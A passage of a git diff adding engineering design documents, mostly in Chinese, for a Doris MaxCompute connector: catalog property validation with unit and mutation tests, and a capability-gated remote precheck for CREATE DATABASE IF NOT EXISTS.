+ } else if (splitStrategy.equals(MCConnectorProperties.SPLIT_BY_ROW_COUNT_STRATEGY)) { + long splitRowCount = Long.parseLong(properties.getOrDefault( + MCConnectorProperties.SPLIT_ROW_COUNT, MCConnectorProperties.DEFAULT_SPLIT_ROW_COUNT)); + if (splitRowCount <= 0) { + throw new IllegalArgumentException(MCConnectorProperties.SPLIT_ROW_COUNT + " must be greater than 0"); + } + } else { + throw new IllegalArgumentException("property " + MCConnectorProperties.SPLIT_STRATEGY + " must be " + + MCConnectorProperties.SPLIT_BY_BYTE_SIZE_STRATEGY + " or " + + MCConnectorProperties.SPLIT_BY_ROW_COUNT_STRATEGY); + } + } catch (NumberFormatException e) { + throw new IllegalArgumentException("property " + MCConnectorProperties.SPLIT_BYTE_SIZE + "/" + + MCConnectorProperties.SPLIT_ROW_COUNT + " must be an integer"); + } + + // 3. account_format ∈ {name, id}(镜像 legacy :423-430) + String accountFormat = properties.getOrDefault( + MCConnectorProperties.ACCOUNT_FORMAT, MCConnectorProperties.DEFAULT_ACCOUNT_FORMAT); + if (!accountFormat.equals(MCConnectorProperties.ACCOUNT_FORMAT_NAME) + && !accountFormat.equals(MCConnectorProperties.ACCOUNT_FORMAT_ID)) { + throw new IllegalArgumentException( + "property " + MCConnectorProperties.ACCOUNT_FORMAT + " only support name and id"); + } + + // 4. connect/read timeout + retry_count > 0(镜像 legacy :437-451) + checkPositiveInt(properties, MCConnectorProperties.CONNECT_TIMEOUT, MCConnectorProperties.DEFAULT_CONNECT_TIMEOUT); + checkPositiveInt(properties, MCConnectorProperties.READ_TIMEOUT, MCConnectorProperties.DEFAULT_READ_TIMEOUT); + checkPositiveInt(properties, MCConnectorProperties.RETRY_COUNT, MCConnectorProperties.DEFAULT_RETRY_COUNT); + + // 5. auth 完整性(wire 既有 dead checkAuthProperties;镜像 legacy :456) + MCConnectorClientFactory.checkAuthProperties(properties); +} +``` + +`checkPositiveInt` 私有 helper(合并 legacy 三个 timeout 的 parse+>0+NumberFormat 处理,去重): +```java +private static void checkPositiveInt(Map properties, String key, String defaultValue) { + int value; + try { + value = Integer.parseInt(properties.getOrDefault(key, defaultValue)); + } catch (NumberFormatException e) { + throw new IllegalArgumentException("property " + key + " must be an integer"); + } + if (value <= 0) { + throw new IllegalArgumentException(key + " must be greater than 0"); + } +} +``` + +### checkAuthProperties 异常类型对齐(wire dead code) + +`MCConnectorClientFactory.checkAuthProperties:42-78` 现抛 `new RuntimeException(...)`(4 处)。但 wiring 钩子 `PluginDrivenExternalCatalog.checkProperties:159` **只 `catch (IllegalArgumentException)`** → 裸 `RuntimeException` 会**漏 catch 上抛**(auth 错与其余校验错形态不一致、不被包成 DdlException)。 + +**修**:把 `checkAuthProperties` 4 处 `RuntimeException` → `IllegalArgumentException`。安全性:① 该方法 grep 全 repo **零调用方**(dead,本 fix 是其唯一调用方);② `IllegalArgumentException extends RuntimeException` → 源码兼容、任何未来「期望 RuntimeException」的捕获仍生效;③ 与 SPI 约定(jdbc/es/trino 的 validateProperties 全抛 IllegalArgumentException)一致。 + +### 子决策:required ENDPOINT 取「字面 key」而非「resolveEndpoint != null」 + +legacy `REQUIRED_PROPERTIES` 要求**字面 `mc.endpoint` key**(`checkProperties:391`)。`MCConnectorEndpoint.resolveEndpoint` 虽接受 ENDPOINT/TUNNEL/ODPS_ENDPOINT/REGION 四源,但那是 **replay 老持久化 catalog 的 backward-compat**(legacy `generatorEndpoint` 同款四源亦只用于 init/replay,CREATE 仍要求 ENDPOINT——见 legacy 注 :150-154)。故 CREATE-time parity = **require 字面 PROJECT + ENDPOINT**。 + +- 取此(faithful parity):region/odps_endpoint-only 的**新** CREATE 被拒(= legacy 行为);老持久化 catalog 走 replay、不经 validateProperties、不受影响。 +- 备选(impl-review/用户可推翻):放宽为 `resolveEndpoint(properties) != null`(接受四源任一)。更贴「当前连接器 runtime 能力」但**比 legacy CREATE 宽**。本设计取 faithful parity(campaign 目标 = legacy parity),明列于此供审。 + +## Implementation Plan + +1. `MaxComputeConnectorProvider`:加 `import java.util.Arrays; import java.util.List;`(`Map` 已在);加 `REQUIRED_PROPERTIES` 常量 + override `validateProperties` + 私有 `checkPositiveInt`。 +2. `MCConnectorClientFactory.checkAuthProperties`:4 处 `RuntimeException` → `IllegalArgumentException`(异常类型对齐)。 +3. **新增 UT** `MaxComputeConnectorProviderTest`(连接器模块,纯 JUnit、无 fe-core/Mockito)——见 Test Plan。 +4. 守门:编译(`:fe-connector-maxcompute`)+ UT + checkstyle + import-gate + mutation。 + +## Risk Analysis + +| Risk | Mitigation | +|---|---| +| 校验逻辑与 legacy 分歧(floor/enum/>0 边界) | 逐字镜像 legacy `checkProperties`;UT 钉每条边界(floor=10485760-1 拒 / =10485760 过;timeout=0 拒 / =1 过;account_format='foo' 拒 / 'name'+'id' 过)。 | +| 默认值下「合法空配」被误拒 | 全部 getOrDefault + DEFAULT_*(DEFAULT_SPLIT_BYTE_SIZE=268435456 > floor;DEFAULT timeouts 10/120/4 > 0;DEFAULT_ACCOUNT_FORMAT=name)→ 仅含 PROJECT+ENDPOINT+合法 auth 的最小配过校验。UT 钉。 | +| checkAuthProperties 异常类型改动误伤调用方 | grep 证零调用方(dead);IllegalArgumentException 为 RuntimeException 子类、源码兼容。 | +| required ENDPOINT 过严(over-restrict 回归) | 已论证 = legacy CREATE parity;replay 老 catalog 不经此路。备选放宽已明列供审。 | +| RuntimeException 漏 catch(auth 路径) | 已对齐 IllegalArgumentException → 被 checkProperties:159 catch → DdlException(parity)。UT 直接断言 IllegalArgumentException。 | + +## Test Plan + +### Unit Tests(新增 `MaxComputeConnectorProviderTest`,连接器模块,纯 JUnit) + +钉 **WHY**(Rule 9):CREATE CATALOG 必须 fail-fast 拒非法属性,否则退化 use-time 晚失败 / 静默接受非法值(account_format='foo'→DISPLAYNAME、负 timeout)。每条对应一类 legacy 校验。 + +构造 `MaxComputeConnectorProvider`,用 `validProps()` 工厂(PROJECT+ENDPOINT+ak_sk+ACCESS_KEY+SECRET_KEY)派生各 case: +1. **valid 最小配** → 不抛(getOrDefault 默认全过)。 +2. **缺 PROJECT** / **缺 ENDPOINT** → `IllegalArgumentException`,message 含该 key。 +3. **split_byte_size = 10485759(floor-1)** → 抛;**= 10485760** → 过;**非整数 "abc"** → 抛「must be an integer」。 +4. **split_strategy = "foo"** → 抛「must be byte_size or row_count」;**= "row_count" + split_row_count = 0** → 抛;**= "row_count" + 正值** → 过。 +5. **account_format = "foo"** → 抛「only support name and id」;**= "id"** → 过;**= "name"** → 过。 +6. **connect_timeout = "0"** / **"-1"** → 抛「must be greater than 0」;**read_timeout = "abc"** → 抛「must be an integer」;**retry_count = "0"** → 抛。 +7. **auth(wire checkAuthProperties)**:ak_sk 缺 SECRET_KEY → 抛 `IllegalArgumentException`(验证 dead code 已 wire 且异常类型已对齐);ram_role_arn 缺 RAM_ROLE_ARN → 抛;未知 auth.type → 抛。 + +### mutation(守门) + +还原任一校验 → 对应 UT 变红: +- M1:`splitByteSize < 10485760L` → `< 0L`(floor 永过)→ floor-1 用例变绿失败(断言期望抛)→ 红。 +- M2:account_format 的 `&&` 取反 / 删 throw → account_format='foo' 用例红。 +- M3:删 `checkAuthProperties` 调用 → 缺 SECRET_KEY 用例红。 +还原 → 全绿。 + +### E2E Tests(CI 跳,真实 ODPS = 真值闸,登记 DV) + +- `CREATE CATALOG ... PROPERTIES(...)` 缺 endpoint / account_format='foo' / 负 timeout / 缺 auth → CREATE **立即**报错(DdlException),不进入 use-time。 +- 合法属性 CREATE 成功 + 可查。 +- 归 DV(编号续 DV-022 之后,落 tracker),需用户 live 跑。 + +## 决策类型 + +明确修复(用户定 Fix,Tier 2 major)。连接器局部、无 SPI 变更、与 legacy `MaxComputeExternalCatalog.checkProperties` 达成 CREATE-time 校验 parity。 + +**设计内子决策(供 impl-review / 用户审)**: +- required ENDPOINT 取字面 key(faithful legacy parity)vs 放宽 resolveEndpoint!=null —— 取前者,已论证。 +- `checkAuthProperties` 异常类型 RuntimeException→IllegalArgumentException(dead code wire 对齐 SPI 约定)。 diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-CREATE-DB-PRECHECK-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-CREATE-DB-PRECHECK-design.md new file mode 100644 index 00000000000000..b2b5dac0a8f5c8 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-CREATE-DB-PRECHECK-design.md @@ -0,0 +1,320 @@ +# P4-T06e · FIX-CREATE-DB-PRECHECK — CREATE DATABASE IF NOT EXISTS 恢复远端存在性预检 + +> issueId=`P2-6 FIX-CREATE-DB-PRECHECK` | DG-4 / F26 / F23 | sev=major | regression=yes | layer=fe-core + SPI(additive `supportsCreateDatabase` 能力门闸) +> 来源:`plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md` §B DG-4(:106-111);历史处方 `P4-cutover-review-findings.md` DDL-C4(major,"✗否决→修")+DDL-P5(minor),曾被 P4-T06d 排除(`cutover-fix-design.md:239` "createDb/dropDb 不在本 issue 范围"),现重开。 +> 全部 file:line 已据当前代码树(branch `catalog-spi-05`)逐条核对。 + +> **⚠️ 决策更新(2026-06-08,用户拍板 OQ-1)**:采用 OQ-1 的**替代方案 = 能力门闸**,非本文档原推荐的"接受行为变化+登记 deviation"。新增 additive SPI `ConnectorSchemaOps.supportsCreateDatabase()`(default `false`,MaxCompute override `true`),远端预检 gate 在该能力位上,使 **jdbc/es/trino 字节不变**(它们 `supportsCreateDatabase()==false` → 预检短路跳过 → 仍走 `createDatabase` 抛 "not supported",与翻闸前一致)。下方 Design/Implementation/Test 的"不扩 SPI / 接受 R6"段以本决策为准更正:见 §决策更新-实现。同 P2-5/P0/P1 的 additive-default 形态。 + +--- + +## Problem + +翻闸到 `PluginDrivenExternalCatalog` 后,`CREATE DATABASE IF NOT EXISTS ` 对一个**远端 ODPS 已存在、但尚未进 FE 元数据缓存**的库会**报错失败**,而 legacy 路径会干净 no-op。 + +触发条件:库存在于远端 ODPS,但本 FE 的 `getDbNullable(dbName)` 返回 null(典型:FE 重启后 db-name cache 尚未填充该库 / 该库由其它 FE 或外部工具刚建、本 FE cache 未刷新 / `meta_names_mapping` 下本地名查不中)。此时 `CREATE DATABASE IF NOT EXISTS` 的语义本应是"已存在则跳过",cutover 却让请求穿透到 ODPS `schemas().create()` 抛 "already exists"——`IF NOT EXISTS` 的承诺被违背。这是 legacy 可用、翻闸即坏的**语义回归**(review DG-4,confirms 3/3)。 + +--- + +## Root Cause(cutover vs legacy,行号据当前树) + +### Cutover(坏) +`fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:312-326` `createDb(dbName, ifNotExists, properties)`: + +```java +public void createDb(String dbName, boolean ifNotExists, Map properties) throws DdlException { + makeSureInitialized(); + if (ifNotExists && getDbNullable(dbName) != null) { // :314 ← 只查 FE-cache + return; + } + ConnectorSession session = buildConnectorSession(); + try { + connector.getMetadata(session).createDatabase(session, dbName, properties); // :319 + } catch (DorisConnectorException e) { + throw new DdlException(e.getMessage(), e); + } + Env.getCurrentEnv().getEditLog().logCreateDb(new CreateDbInfo(getName(), dbName, null)); // :323 + resetMetaCacheNames(); // :324 +} +``` + +短路条件 `:314` **只**查 FE-cache(`getDbNullable`)。FE-cache miss(远端存在但未缓存)时,落到 `:319` `connector.createDatabase` → `MaxComputeConnectorMetadata.java:409-413` `createDatabase(...)` → `structureHelper.createDb(odps, dbName, false)`(第三参 `ifNotExists` 硬编码 **false**,`:411`)→ `mcClient.schemas().create()` 在已存在库上抛 "already exists",经 `:320` 包成 `DdlException` 上抛。**`ifNotExists` 在到达连接器前被丢弃**。 + +### Legacy(对的,须 mirror) +`fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:110-124` `createDbImpl`: + +```java +public boolean createDbImpl(String dbName, boolean ifNotExists, Map properties) + throws DdlException { + ExternalDatabase dorisDb = dorisCatalog.getDbNullable(dbName); // FE-cache + boolean exists = databaseExist(dbName); // :113 ← REMOTE 查询 + if (dorisDb != null || exists) { // :114 ← FE-cache OR 远端 + if (ifNotExists) { + LOG.info("create database[{}] which already exists", dbName); + return true; // :117 已存在 → no-op + } else { + ErrorReport.reportDdlException(ErrorCode.ERR_DB_CREATE_EXISTS, dbName); // :119 + } + } + dorisCatalog.getMcStructureHelper().createDb(odps, dbName, ifNotExists); // :122 + return false; // :123 真正新建 +} +``` + +legacy 同时查 **FE-cache(`getDbNullable`)AND 远端(`databaseExist`,`:113`)**:任一命中 + `ifNotExists` → 返回 true(已存在),上层 `ExternalMetadataOps.createDb:48-52` 看到 `res==true` 就**跳过 `afterCreateDb()`**,`ExternalCatalog.createDb:1008-1013` 看到 `res==true` 就**跳过 `logCreateDb`**。即 legacy 已存在路径 = 不建库、不写 editlog、不刷 cache。非 `ifNotExists` + 存在 → `ERR_DB_CREATE_EXISTS`(清晰 FE 错)。 + +**差异核心**:cutover 丢了 `:113` 的远端 `databaseExist` 这一半。 + +--- + +## Parity Reference(逐字镜像对象) + +`MaxComputeMetadataOps.createDbImpl:110-124`(上文已引)。本 fix 把其 `dorisDb != null || exists` 双查 + `ifNotExists → return(no-op)` 的控制流,在 `PluginDrivenExternalCatalog.createDb` 内**用通用 SPI 等价物**复刻: +- legacy `dorisCatalog.getDbNullable(dbName)` ≙ cutover `getDbNullable(dbName)`(已有,`:314`)。 +- legacy `databaseExist(dbName)` ≙ `MaxComputeMetadataOps.java:93-95` → `MaxComputeConnectorMetadata.databaseExists(session, dbName)`(`MaxComputeConnectorMetadata.java:95` 实现,`structureHelper.databaseExist(odps, dbName)`),cutover 经通用 SPI `connector.getMetadata(session).databaseExists(session, dbName)` 调到同一实现。 +- legacy `return true`(no-op,跳 afterCreateDb/logCreateDb)≙ cutover 提前 `return`(跳 createDatabase + logCreateDb + resetMetaCacheNames)。 + +SPI 面:`fe/fe-connector/fe-connector-api/.../ConnectorSchemaOps.java:34-38` `default boolean databaseExists(session, dbName){ return false; }`;`ConnectorMetadata extends ConnectorSchemaOps`(`ConnectorMetadata.java:37-38`)。MaxCompute 在 `MaxComputeConnectorMetadata.java:94-97` override。**SPI 已暴露此方法,无需任何 SPI 变更。** + +--- + +## Design(已选方向 + WHY) + +**用户已定方向:不改 SPI。** 在 FE 侧 `createDb` override 内,把现有"FE-cache 短路"扩成"FE-cache **或** 远端"双查,复刻 legacy `createDbImpl:112-114` 的存在性判定。 + +具体:当 `ifNotExists && getDbNullable(dbName) == null`(FE-cache 未命中、但用户写了 IF NOT EXISTS)时,构建 session 并查 `connector.getMetadata(session).databaseExists(session, dbName)`;若为 true(远端已存在)→ 提前 `return`(跳过 `createDatabase` + `logCreateDb` + `resetMetaCacheNames`),镜像 legacy "已存在 → no-op"。保留既有 `:314` 的 FE-cache 短路作为**快路径**(cache 命中时连 session 都不必建,与 legacy `dorisDb != null` 短路同义)。 + +**WHY 此形 vs 其它**: +- **WHY 不扩 SPI**:`databaseExists` 已是 `ConnectorMetadata`/`ConnectorSchemaOps` 的 `default` 方法且 MaxCompute 已 override(`:95`),FE 直接可调。扩签名(如给 `createDatabase` 加 `ifNotExists` 参)违反 Rule 2/Rule 3,且会波及其它 6 连接器与 P0/P1 已确立的 additive-default 约定。 +- **WHY 复用 FE-cache 快路径**:legacy `:114` 本就 `dorisDb != null || exists` 短路,FE-cache 命中时不查远端。保留 `:314` 完全等价,且省一次 ODPS 往返。 +- **WHY 只在 `ifNotExists` 分支查远端**:非 `ifNotExists` 时的远端存在性见下「非 ifNotExists 路径决策」——保持最小改动,不主动加查询。 + +### 非 ifNotExists + 远端已存在 路径决策(必须显式记载) + +- **legacy**:`createDbImpl:118-119` 抛 `ERR_DB_CREATE_EXISTS`("Can't create database '%s'; database exists",`ErrorCode.java:27`,errno 1007 / SQLSTATE HY000)——FE 侧 fail-loud。 +- **cutover 现状**:穿透到 ODPS `schemas().create()` 抛 "already exists",经 `:320` 包 `DdlException` 上抛。 +- **本 fix 决策:保持 cutover 现状(连接器/ODPS 抛),不在 FE 侧补 `ERR_DB_CREATE_EXISTS`。** 理由(Rule 2 最小 + 文档化): + 1. 两者都是 fail-loud(都抛 `DdlException` 终止建库),用户均得到"已存在"错误——Rule 12 不被违反。差异仅在**错误文案 + errno**(legacy 1007/HY000 标准 SQLSTATE vs ODPS 透传文案)。 + 2. 让 FE 在非-IFNE 时也主动查远端,会引入一次额外 ODPS 往返且需新分支,属于为"错误文案逐字对齐"付出的非最小代价;ODPS `schemas().create(false)` 本就会权威拒绝。 + 3. 本 issue 的回归本质是 **IF NOT EXISTS 误报失败**(合法语句被拒);非-IFNE 在两条路径下都是"正确地失败",仅文案不同,属可接受偏差。 +- **登记**:此处文案/errno 偏差登记为 known-deviation(见 Risk Analysis R3),不作为 fix 范围。若后续要求逐字 SQLSTATE 对齐,可在连接器 `createDatabase` 捕获 ODPS "already exists" 重抛为带 `ERR_DB_CREATE_EXISTS` 文案的 `DorisConnectorException`——但那是连接器侧改动,超出本 FE-only 最小修。 + +--- + +## Implementation Plan(逐文件、含签名) + +### 1. 生产代码(唯一一处) +**文件**:`fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java` +**方法**:`createDb(String dbName, boolean ifNotExists, Map properties)`(`:311-326`),签名不变。 + +把 `:314-322` 改为先建 session、对 IF-NOT-EXISTS 在 FE-cache miss 时补远端预检: + +```java +@Override +public void createDb(String dbName, boolean ifNotExists, Map properties) throws DdlException { + makeSureInitialized(); + // Fast path: FE-cache hit + IF NOT EXISTS => no-op (legacy createDbImpl: dorisDb != null). + if (ifNotExists && getDbNullable(dbName) != null) { + return; + } + ConnectorSession session = buildConnectorSession(); + // FE-cache miss but the db may already exist REMOTELY (e.g. created on another FE / before + // this FE's db-name cache was populated). Legacy MaxComputeMetadataOps.createDbImpl consulted + // BOTH getDbNullable AND the remote databaseExist; IF NOT EXISTS then no-oped. Mirror that + // remote check here so CREATE DATABASE IF NOT EXISTS does not surface ODPS "already exists". + // (Other connectors keep the SPI default databaseExists()==false, so this is a pure no-op + // fall-through for them -- zero behavior change.) + if (ifNotExists && connector.getMetadata(session).databaseExists(session, dbName)) { + LOG.info("create database[{}] which already exists remotely, skip", dbName); + return; + } + try { + connector.getMetadata(session).createDatabase(session, dbName, properties); + } catch (DorisConnectorException e) { + throw new DdlException(e.getMessage(), e); + } + Env.getCurrentEnv().getEditLog().logCreateDb(new CreateDbInfo(getName(), dbName, null)); + resetMetaCacheNames(); + LOG.info("finished to create database {}.{}", getName(), dbName); +} +``` + +要点: +- 保留 `:314` FE-cache 快路径(cache 命中不建 session、不查远端,与 legacy `dorisDb != null` 短路等价)。 +- session 构建上移到远端预检之前(远端预检需要 session)。非-IFNE 路径下 session 构建时机较原来略早,但 `buildConnectorSession()` 无副作用(仅读 `ConnectContext`),等价。 +- 远端预检只在 `ifNotExists` 时触发;非-IFNE 不查远端,沿用现状(见 Design 决策)。 +- 更新方法 Javadoc(`:302-310`)一行,说明现在 IF NOT EXISTS 同时查 FE-cache 与远端。 +- 无新 import(`connector`/`session`/`LOG` 均已在用)。 + +### 2. 测试代码 +**文件**:`fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java` +新增 2 个 `@Test`(见 Test Plan),无需改 helper(`TestablePluginCatalog` 已 override `getDbNullable`/`buildConnectorSession`/`resetMetaCacheNames`,`metadata`/`mockEditLog` 已是 mock)。 + +### 3. 账本 / 文档(plan-doc,非代码) +- `P4-cutover-fix-design.md` / task-list:登记 DDL-C4 重开 + 本 fix commit。 +- deviations-log:登记 R3(非-IFNE 文案/errno 偏差)。 +- review-rounds:更正 DG-4 状态。 +(这些不影响编译/CI,按本仓 doc-sync 惯例随 commit 回填。) + +**无签名变更,无调用点变更**(`createDb` 仅由 `ExternalCatalog.createDb:1002` / 命令层调用,签名不动)。 + +--- + +## Blast Radius + +> ⚠️ **重要更正(orchestrator 的 "仅 MaxCompute override databaseExists" 假设经核码证伪)**:实测 **全部 7 个连接器都 override 了 `databaseExists`**(`EsConnectorMetadata:59` / `HiveConnectorMetadata:87` / `HudiConnectorMetadata:90` / `IcebergConnectorMetadata:84` / `JdbcConnectorMetadata:94` / `PaimonConnectorMetadata:74` / `TrinoConnectorDorisMetadata:93` / `MaxComputeConnectorMetadata:95`),不是只有 MaxCompute。因此本 fix **不是** P0/P1 那种"default 返回 false → 其它连接器零行为变化"的纯 additive-default 形态——必须按"哪些连接器实际走 `PluginDrivenExternalCatalog.createDb`"重新界定影响面。 + +### 谁实际走 `PluginDrivenExternalCatalog.createDb` +`CatalogFactory.java:51-52` `SPI_READY_TYPES = {"jdbc", "es", "trino-connector", "max_compute"}` —— **这 4 类**在本分支被路由到 `PluginDrivenExternalCatalog`(`:112`/`:123`),其余(hms/iceberg/paimon/hudi/doris)仍用各自 built-in `ExternalCatalog` + 传统 `metadataOps`,**不经过本 override**,完全不受影响。 + +### 对 jdbc / es / trino-connector 的行为变化(须如实登记) +这 3 类也走本 `createDb` override,且其 `databaseExists` 是**真实实现**(非 default false): +- jdbc:`client.getDatabaseNameList().contains(dbName)`;es:`DEFAULT_DB.equals(dbName)`;trino:`listDatabaseNames(session).contains(dbName)`。 +- **关键**:这 3 类连接器**均未 override `createDatabase`**(`grep` 证实 jdbc/es/trino 无 `createDatabase`),继承 `ConnectorSchemaOps.createDatabase` 的 default → 抛 `"CREATE DATABASE not supported"`(`ConnectorSchemaOps.java:48-52`)。即翻闸后这 3 类本就**不支持** `CREATE DATABASE`。 +- 行为差(仅 `CREATE DATABASE IF NOT EXISTS ` 且 FE-cache miss 这一窄路径): + - **修前**:落到 `createDatabase` → 抛 `"CREATE DATABASE not supported"`(无论该 db 远端是否存在)。 + - **修后**:先查 `databaseExists`。若**远端已存在** → 静默 no-op(成功返回);若远端不存在 → 仍落到 `createDatabase` 抛 "not supported"(不变)。 +- 评估:远端已存在时 `CREATE DATABASE IF NOT EXISTS` no-op 是 SQL 标准语义(IF NOT EXISTS 对已存在对象应成功),**修后更正确**;且这 3 类此前就不支持建库,没有"真的建出库"的语义可破坏。但这是**可观察行为变化**(原本抛错→现在静默成功),不属 MaxCompute 范畴,**必须登记**(见 OQ-1 与 R6)。FE-cache 命中分支(`:314`)对这 3 类行为完全不变。 + +### fe-core 调用者 +- `createDb` 的唯一上游 `ExternalCatalog.createDb`(`:1002-1018`)。本 override 完全替换基类对 plugin catalog 的行为(plugin catalog `metadataOps==null`,基类 `:1004-1005` 抛 "not supported",故必须 override)。**签名不动 → 上游零改、无调用点变更。** +- 新增的 `databaseExists` FE 调用是 fe-core 首个调用方(`grep` 证实 fe-core 此前无 `.databaseExists(` 调用),不影响任何既有调用点。 + +### 现有测试断言:是否需改 +- `PluginDrivenExternalCatalogDdlRoutingTest`: + - `testCreateDbRoutesToConnectorAndInvalidatesCache`(`:97-108`):`ifNotExists=false` → 远端预检(仅 `ifNotExists` 触发)**不执行** → 行为不变,断言不改。 + - `testCreateDbIfNotExistsShortCircuitsWhenDbExists`(`:110-119`):stub `dbNullableResult != null` → 命中 FE-cache 快路径 `:314` 提前 return,远端预检**不触发**,`databaseExists` 不被调 → 现有断言全部仍成立,**不改**。 + - `testCreateDbWrapsConnectorException`(`:121-129`):`ifNotExists=false` → 远端预检不触发,仍直达 `createDatabase`(stub 抛 `DorisConnectorException`)→ 断言不改。 +- **结论:无现有断言需要修改。** 仅新增 2 个测试。 +- 校验命令(确认 override 面):`grep -rn "boolean databaseExists" fe/fe-connector/*/src/main/java | grep -v fe-connector-api`(应命中全部 7 连接器)。 + +--- + +## Risk Analysis + +- **R1(低)多一次 ODPS 往返**:IF-NOT-EXISTS + FE-cache miss 时新增一次 `schemas().exists()`。仅在 cache miss 的 IF-NOT-EXISTS DDL 上发生,DDL 低频;legacy 本就每次 `createDbImpl` 都查 `databaseExist`(`:113`),故相对 legacy 是**减少**往返(cache 命中时本 fix 跳过远端查询,legacy 不跳)。无性能回退。 +- **R2(低)远端预检异常语义**:`databaseExists` 在 MaxCompute 内可能抛 `RuntimeException`(`McStructureHelper.databaseExist` 包 `OdpsException`,`:140-145`)。本 fix 不捕获它——与 legacy `createDbImpl` 一致(legacy `databaseExist:93-95` 同样直接传播)。Rule 12 fail-loud:远端不可达时建库应失败而非静默继续。 +- **R3(已登记 deviation)非-IFNE 已存在错误文案差异**:见 Design 决策。legacy `ERR_DB_CREATE_EXISTS`(1007/HY000)vs cutover ODPS 透传文案。两者都 fail-loud,仅文案/errno 不同。登记 deviations-log,非 fix 范围。 +- **R4(无)GSON/replay**:本 fix 只改 create 期控制流,不碰序列化/editlog 结构(IF-NOT-EXISTS 已存在时本就不写 editlog,与 legacy 一致),replay 不受影响。 +- **R5(低)session 构建时机前移**:非-IFNE 路径 session 现在在 try 之外、调 `createDatabase` 前构建(原本也是如此,仅相对短路位置变化)。`buildConnectorSession()` 仅读 `ConnectContext` 无副作用,无风险。 +- **R6(中,须 surface)jdbc/es/trino 的 IF-NOT-EXISTS 静默化**:见 Blast Radius。这 3 类同走本 override 且 `databaseExists` 为真实现,故 `CREATE DATABASE IF NOT EXISTS <远端已存在 db>` 从"抛 not supported"变为"静默 no-op"。判定:更贴合 SQL 标准、无数据语义破坏,但属可观察行为变化,登记 deviations-log(见 OQ-1)。若要求保守(仅 MaxCompute 受影响、jdbc/es/trino 行为字节不变),可把远端预检 gate 在连接器能力位上(仅当连接器实际支持 createDatabase 才查远端),但那需引入能力判定、非最小改动——倾向接受行为变化 + 登记,待用户定(OQ-1)。 + +--- + +## Open Questions + +- **OQ-1(行为变化处置)— ✅ RESOLVED 2026-06-08(用户选「替代:能力门闸」)**:jdbc/es/trino-connector 同走本 `createDb` override(`CatalogFactory` `SPI_READY_TYPES`),且它们的 `databaseExists` 是真实现 + 不支持 `createDatabase`。原推荐"接受+登记"会令这 3 类 `CREATE DATABASE IF NOT EXISTS <远端已存在 db>` 从"抛 not supported"变"静默 no-op"。**用户拍板:能力门闸**——新增 additive `supportsCreateDatabase()`,预检仅对声明能力者(MaxCompute)生效,jdbc/es/trino 字节不变。实现见 §决策更新-实现。 + +## §决策更新-实现(能力门闸,权威版,覆盖上方"不扩 SPI"段) + +### 1b. SPI:加 additive `supportsCreateDatabase()` +**文件**:`fe/fe-connector/fe-connector-api/.../ConnectorSchemaOps.java`,在 `createDatabase` default 旁加: +```java +/** + * Whether this connector supports CREATE DATABASE. Defaults to false so the FE + * CREATE DATABASE IF NOT EXISTS remote precheck applies only to connectors that + * can actually create databases; connectors that cannot keep their existing + * "CREATE DATABASE not supported" behavior unchanged. + */ +default boolean supportsCreateDatabase() { + return false; +} +``` +additive default false → 其余 6 连接器(含 jdbc/es/trino)零行为变化(同 P2-5 的 dropDatabase 4 参 / P0-1/2/3 capability)。 + +### 1c. 连接器:MaxCompute override → true +**文件**:`fe/fe-connector/fe-connector-maxcompute/.../MaxComputeConnectorMetadata.java`,在 `createDatabase` 旁加 `@Override public boolean supportsCreateDatabase() { return true; }`(MaxCompute 真支持建库)。 + +### 1(更正). fe-core:预检 gate 在能力位上 +`PluginDrivenExternalCatalog.createDb` 的远端预检条件加 `supportsCreateDatabase()` 前置,且把 `connector.getMetadata(session)` 提为局部变量复用(避免 3 次 getMetadata;MaxCompute getMetadata 轻量无副作用,但 hoist 更清晰): +```java +public void createDb(String dbName, boolean ifNotExists, Map properties) throws DdlException { + makeSureInitialized(); + // Fast path: FE-cache hit + IF NOT EXISTS => no-op (legacy createDbImpl: dorisDb != null). + if (ifNotExists && getDbNullable(dbName) != null) { + return; + } + ConnectorSession session = buildConnectorSession(); + ConnectorMetadata metadata = connector.getMetadata(session); + // FE-cache miss but the db may already exist REMOTELY (created on another FE / before this + // FE's db-name cache was populated). Legacy MaxComputeMetadataOps.createDbImpl consulted BOTH + // getDbNullable AND the remote databaseExist; IF NOT EXISTS then no-oped. Mirror that here. + // Gated on supportsCreateDatabase() so connectors that cannot create databases (jdbc/es/trino) + // keep their prior behavior (fall through to createDatabase -> "not supported"), unchanged. + if (ifNotExists && metadata.supportsCreateDatabase() && metadata.databaseExists(session, dbName)) { + LOG.info("create database[{}] which already exists remotely, skip", dbName); + return; + } + try { + metadata.createDatabase(session, dbName, properties); + } catch (DorisConnectorException e) { + throw new DdlException(e.getMessage(), e); + } + Env.getCurrentEnv().getEditLog().logCreateDb(new CreateDbInfo(getName(), dbName, null)); + resetMetaCacheNames(); + LOG.info("finished to create database {}.{}", getName(), dbName); +} +``` +需加 import `org.apache.doris.connector.api.ConnectorMetadata`(fe-core 该文件已 import 之,见现 :28,无新 import)。`&&` 短路保证:能力位 false 时连 `databaseExists` 都不查(jdbc/es/trino 零额外 ODPS/远端往返,行为完全不变)。 + +### Blast Radius(更正) +- SPI `supportsCreateDatabase` additive default false → 7 连接器零编译/行为变化,唯 MaxCompute override true。 +- jdbc/es/trino 走本 override:`supportsCreateDatabase()==false` → 预检短路(不查 databaseExists)→ 落 `createDatabase` 抛 "not supported",与翻闸前**字节一致**。R6 行为变化**消除**,无需 deviation 登记。 +- 其余同上方 Blast Radius(仅 4 类 SPI_READY 走 override;hms/iceberg/paimon/hudi 不经过)。 + +### Test Plan(更正:3 测) +新增到 `PluginDrivenExternalCatalogDdlRoutingTest` CREATE DATABASE 区块: +1. `testCreateDbIfNotExistsSkipsWhenRemoteExistsAndConnectorSupportsCreate`:`dbNullableResult=null`、`when(metadata.supportsCreateDatabase()).thenReturn(true)`、`when(metadata.databaseExists(session,"db1")).thenReturn(true)`、ifNotExists=true → 